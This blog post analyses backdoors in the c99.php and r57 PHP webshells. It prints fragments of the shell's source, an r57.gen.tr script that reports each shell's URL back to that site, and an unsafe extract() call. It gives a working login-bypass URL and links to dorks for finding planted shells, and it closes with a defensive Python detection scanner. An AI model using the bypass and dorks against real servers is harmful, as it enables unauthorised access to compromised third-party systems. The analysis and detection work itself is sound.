Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s)


Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s). Do you know this sh3ll? If the answer is yes, you might be infected!

A recent discovery by Matthew Bryant of the Yahoo! Security Team (thehackerblog.com) found that the most widely used "hacker" sh3ll contains several backdoors, which let anyone bypass its authentication and gain access to the sh3ll without knowing the password.

He also found that the site r57.gen.tr tracks its users, letting its admins collect the URL of every website where the sh3ll is installed.

1) SH3LL STEALING CODE

Let's focus on the code:
-----------------------------

[CODE]

mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "https://" c99.php 
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";}


mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "http://" c99.php 
11:   http://ccteam.ru/releases/c99shell
13:*  WEB: http://ccteam.ru
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
99:$accessdeniedmess = "c99shell v.".$shver.": access denied";
103:$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
259:if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
599:# Home page: http://ccteam.ru
855:?><?php echo getenv("HTTP_HOST"); ?> - c99shell

!C99Shell v. !

Software:  

uname -a: ",1); ?> 

",1);} else {echo get_current_user();} ?> 

Safe-mode: 

1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";}

2912:if ($act == "about") {echo "

Credits:
Idea, leading and coding by tristram[CCTeaM].
Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
Thanks all who report bugs.
All bugs send to tristram's ICQ #656555 .
";}
2926:

--[ c99shell v. powered by Captain Crunch Security Team | r57 shell | Generation time: ]--


mandatory@mandatorys-box:~/Pentest/c99$

-------------------------------------

But let's look more closely here:



And then let's see what this script does! (http://www.r57.gen.tr/yazciz/ciz.js)



Oops!

"a='+escape(location.href);"

This is not just a simple JavaScript instruction: with that command, the r57.gen.tr admins can collect the URLs of other people's sh3lls,

whether to report them to the affected admins and/or to take action with law enforcement!

Ex. http://www.r57.gen.tr/yaz/yaz.php?a=[OUR URL HERE]


2) AUTH BYPASS METHOD

Let's look into this code:


As we can see, there is an extract() call!

With this, an attacker can have request values extracted into variables, which changes how the sh3ll reads its credentials!


So the variables $login and $md5_pass can be overridden, and with that the sh3ll's login check can be bypassed.

This is the Vulnerable Code:
---------------------------------------

[CODE]

//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg         = "#FFFFFF";
$highlight_comment    = "#6A6A6A";
$highlight_default    = "#0000BB";
$highlight_html       = "#1300FF";
$highlight_keyword    = "#007700";
$highlight_string     = "#000000";

@$f = $_REQUEST["f"];
// Client-controlled extract(): every key of the c99shcook[...] request array
// becomes a local variable, so $login / $md5_pass below can be overwritten.
@extract($_REQUEST["c99shcook"]);

//END CONFIGURATION

// \/ Next code isn't for editing \/
$tmp = array();
if ($login) {
    if (empty($md5_pass)) {
        $md5_pass = md5($pass);
    }
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
        if ($login_txt === false) {
            $login_txt = "";
        } elseif (empty($login_txt)) {
            $login_txt = strip_tags(ereg_replace(" |\n", " ", $donated_html));
        }
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
        header("HTTP/1.0 401 Unauthorized");
        exit($accessdeniedmess);
    }
}
------------------------------------------------------------------------------------------------

This line lets a client overwrite any variable by sending an array:

@extract($_REQUEST["c99shcook"]);

Which means that if we request a URL like the one below, we can bypass its restrictions:

http://127.0.0.1/c99.php?c99shcook[login]=0

Et voilà! Here is the result:



Now you know how to bypass the sh3ll's restrictions without knowing its password!
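As an added example (not part of the original post, and not Matthew Bryant's or the c99/r57 authors' code), here is a small Python scanner written from the defender's side. It covers both findings above: it looks through PHP source for the r57.gen.tr tracking script from section 1 and for an extract() over client-supplied request data from section 2, and it flags web-server access-log requests that carry the c99shcook[...] override parameter, URL-encoded or not. The PHP snippet and the log lines are constructed samples; the log format assumed is the common Apache/nginx combined style.

```python
import re
from urllib.parse import unquote

# Source-level indicators named in the post: the r57.gen.tr tracking script and
# an extract() over client-supplied request data (the auth-bypass root cause).
SOURCE_INDICATORS = {
    "r57_tracker": re.compile(r"r57\.gen\.tr/yazciz/ciz\.js", re.IGNORECASE),
    "extract_request": re.compile(
        r"@?\s*extract\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b", re.IGNORECASE
    ),
}

# Query parameter the post shows overriding $login (matched after URL-decoding).
BYPASS_PARAM = re.compile(r"c99shcook\[", re.IGNORECASE)

# Assumed access-log layout: ip, two dash fields, [timestamp], "request line", status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_php_source(source: str) -> list:
    """Return (indicator_name, line_number) for every indicator hit in a PHP file."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in SOURCE_INDICATORS.items():
            if pattern.search(line):
                hits.append((name, lineno))
    return hits


def scan_access_log(lines) -> list:
    """Return one alert dict per request whose target carries the c99shcook[...] override."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parsable access-log line, skip it
        # Decode %5B/%5D etc. so the encoded form of the parameter is caught as well.
        target = unquote(m.group("target"))
        if BYPASS_PARAM.search(target):
            alerts.append(
                {"ip": m.group("ip"), "target": target, "status": int(m.group("status"))}
            )
    return alerts


# --- constructed samples (not taken from the original post) -------------------
PHP_SAMPLE = (
    "<?php\n"
    '$highlight_string = "#000000";\n'
    '@$f = $_REQUEST["f"];\n'
    '@extract($_REQUEST["c99shcook"]);\n'
    "if ($login) { /* HTTP Basic auth check lives here */ }\n"
    "echo '<script src=\"http://www.r57.gen.tr/yazciz/ciz.js\"></script>';\n"
)

LOG_SAMPLE = [
    '203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] "GET /uploads/c99.php?c99shcook[login]=0 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2014:13:55:40 +0000] "GET /uploads/c99.php?c99shcook%5Blogin%5D=0 HTTP/1.1" 200 5123',
    '198.51.100.7 - - [10/Oct/2014:14:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for name, lineno in scan_php_source(PHP_SAMPLE):
        print(f"source indicator {name} at line {lineno}")
    for alert in scan_access_log(LOG_SAMPLE):
        print(f"bypass attempt from {alert['ip']}: {alert['target']} -> HTTP {alert['status']}")
```

A source hit on either indicator means the file is a planted webshell and should be removed, not patched; a log hit with a 200 status means the sh3ll was reachable and the host should be treated as compromised, since the post shows that the login check offers no protection at that point.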

--------------------------------------------------------------------------------------

Source:
Security Researcher *ORIGINAL* Article(s):

1) http://thehackerblog.com/hacking-script-kiddies-r57-gen-tr-shells-are-backdoored-in-a-way-you-probably-wouldnt-guess/

2) http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/

c99.php sh3ll Dorks:

http://www.hackingsec.in/2012/04/google-dorks-find-backdoor-c99-find.html

Vulnerable Sh3ll Code:

http://pastebin.com/LCDrr0e8

-------------------------------------

About the Author :
Christian Galeone is a cyber security researcher from Italy; he is currently studying at ITCL Marco Polo (Upper-Secondary Technical Institute), attending the IT Programming class.
He has been acknowledged by the top 5 companies, including Yahoo!, Microsoft, AT&T and Sony. His future goal is to be a cyber security specialist working for the national security of his country.